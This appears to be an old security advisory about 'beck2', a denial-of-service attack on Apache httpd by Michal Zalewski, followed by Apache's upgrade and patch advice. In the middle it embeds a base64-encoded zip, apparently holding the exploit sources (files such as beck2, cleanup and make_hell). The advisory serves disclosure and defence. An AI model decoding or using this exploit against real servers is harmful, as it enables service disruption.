COMMAND
httpd (Apache)
SYSTEMS AFFECTED
Systems running Apache
PROBLEM
Michal Zalewski found following about Apache memory/process
management or in other words another (less interesting) example of
Apache DoS attack, called 'beck2'. This attack is possible in
two cases:
1. Attacker owns an account on a victim machine, or
2. Victim's directory structure is very deep (?).
When one of above statements is true, it's possible to perform a
remote attack, even when Apache has been already patched against
first version of 'beck' (see 'httpd #25' in mUNIXes section of
Security Bugware). More details can be deducted from sources.
---
Content-Type: application/octet-stream; name="beck2.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="beck2.zip"
Content-MD5: eb4dO9MGyWSv3JBZ8LqD+Q==
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
-----
SOLUTION
Apache very strongly recommends that anyone using versions of
Apache previous to 1.2 or earlier 1.2 versions upgrade to the
released 1.2.5. It is now available at:
http://www.apache.org/dist/
There are no plans for an immediate 1.3b4 release to correct these
problems in the 1.3 beta development tree, however we will make
patches for 1.3b3 to correct these issues available at:
http://www.apache.org/dist/patches/apply_to_1.3b3/